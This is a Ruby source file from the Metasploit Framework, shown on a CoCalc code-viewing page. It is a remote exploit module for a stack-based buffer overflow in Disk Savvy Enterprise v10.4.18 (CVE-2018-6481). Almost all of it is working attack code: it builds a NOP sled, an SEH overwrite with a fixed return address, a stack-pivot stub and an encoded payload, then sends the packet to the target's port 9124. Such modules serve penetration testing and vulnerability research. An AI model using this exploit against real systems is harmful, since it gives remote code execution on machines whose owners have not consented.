CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/misc/disk_savvy_adm.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = GreatRanking

8


9
  include Msf::Exploit::Remote::Tcp

10
  include Msf::Exploit::Remote::Seh

11


12
  def initialize(info = {})

13
    super(update_info(info,

14
      'Name'           => 'Disk Savvy Enterprise v10.4.18',

15
      'Description'    => %q{

16
        This module exploits a stack-based buffer overflow vulnerability

17
        in Disk Savvy Enterprise v10.4.18, caused by improper bounds

18
        checking of the request sent to the built-in server. This module

19
        has been tested successfully on Windows 7 SP1 x86.

20
      },

21
      'License'        => MSF_LICENSE,

22
      'Author'         =>

23
        [

24
          'Daniel Teixeira'

25
        ],

26
      'DefaultOptions' =>

27
        {

28
          'EXITFUNC' => 'thread'

29
        },

30
      'Platform'       => 'win',

31
      'Payload'        =>

32
        {

33
          'BadChars'   => "\x00\x02\x0a\x0d\xf8",

34
          'Space'      => 800

35
        },

36
      'Referencess'        =>

37
        [

38
          [ 'CVE', '2018-6481' ]

39
        ],

40
      'Targets'        =>

41
        [

42
          [ 'Disk Savvy Enterprise v10.4.18',

43
            {

44
              'Offset' => 124,

45
              'Ret'    => 0x10056d13

46
            }

47
          ]

48
        ],

49
      'Privileged'     => true,

50
      'DisclosureDate' => '2017-01-31',

51
      'DefaultTarget'  => 0))

52


53
    register_options([Opt::RPORT(9124)])

54


55
  end

56


57
  def exploit

58
    seh = generate_seh_record(target.ret)

59
    connect

60


61
    buffer = make_nops(target['Offset'])

62
    buffer << seh

63
    buffer << "\x83\xc4\x7f" * 13   #ADD esp,7fh

64
    buffer << "\x83\xc4\x21"        #ADD esp,21h

65
    buffer << "\xff\xe4"            #JMP esp

66
    buffer << payload.encoded

67
    buffer << Rex::Text.rand_text_alphanumeric(1)

68


69
    header = "\x75\x19\xba\xab"

70
    header << "\x03\x00\x00\x00"

71
    header << "\x00\x40\x00\x00"

72
    header << [buffer.length].pack("V")

73
    header << [buffer.length].pack("V")

74
    header << [buffer[-1].ord].pack("V")

75
    packet = header

76
    packet << buffer

77


78
    sock.put(packet)

79
    handler

80
  end

81
end

82


83